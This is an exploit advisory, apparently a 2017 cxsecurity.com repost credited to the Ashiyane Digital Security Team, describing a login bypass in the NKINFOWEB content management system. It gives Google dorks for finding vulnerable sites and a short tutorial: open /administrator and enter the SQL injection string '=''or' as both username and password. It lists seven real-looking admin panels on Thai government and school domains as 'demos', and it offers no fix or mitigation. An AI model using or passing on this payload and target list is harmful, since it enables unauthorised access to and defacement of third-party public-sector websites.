NKINFOWEB Bypass Login Vulnerability

Published
Credit
Risk
2017.08.10
Ashiyane Digital Security Team
Medium
CWE
CVE
Local
Remote
N/A
N/A
No
Yes
Dork: intext:NKINFOWEB V3 demo and site:.th intext:NKINFOWEB

=============================================================|
|
|-------------------In The Name Of God------------------------|
|
| Exploit Title : NKINFOWEB Bypass Login Vulnerability
|
| Exploit Author : Ashiyane Digital Security Team
|
| Google Dork 1 : intext:NKINFOWEB V3 demo
|
| Google Dork 2 : site:.th intext:NKINFOWEB
|
| Tested on : Win 7 / Google Chrome
|
| Date : 2017-08-10
|
| Vendor HomePage : http://www.nkinfoweb.org/
|
|======================================|
|
| Tutorial :
|
| Search The Dork And Select Your Target
| Then Go To Admin Panel At : /administrator
|
| Username: '=''or'
| Password: '=''or'
|======================================|
|
| Demos :
|
| http://ssk3.go.th/administrator/
| http://www.dongsomboon.go.th/administrator/
| http://www.dokkhamtai.go.th/administrator/
| http://bw3.bwschool.ac.th/administrator/
| http://www.nbwit.ac.th/administrator/
| http://drwit.sesao33.net/administrator/
| http://www.tratcc.ac.th/administrator/
|
|=============================================================|
| Discovered By : Cyber.Defacer
|=============================================================|


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com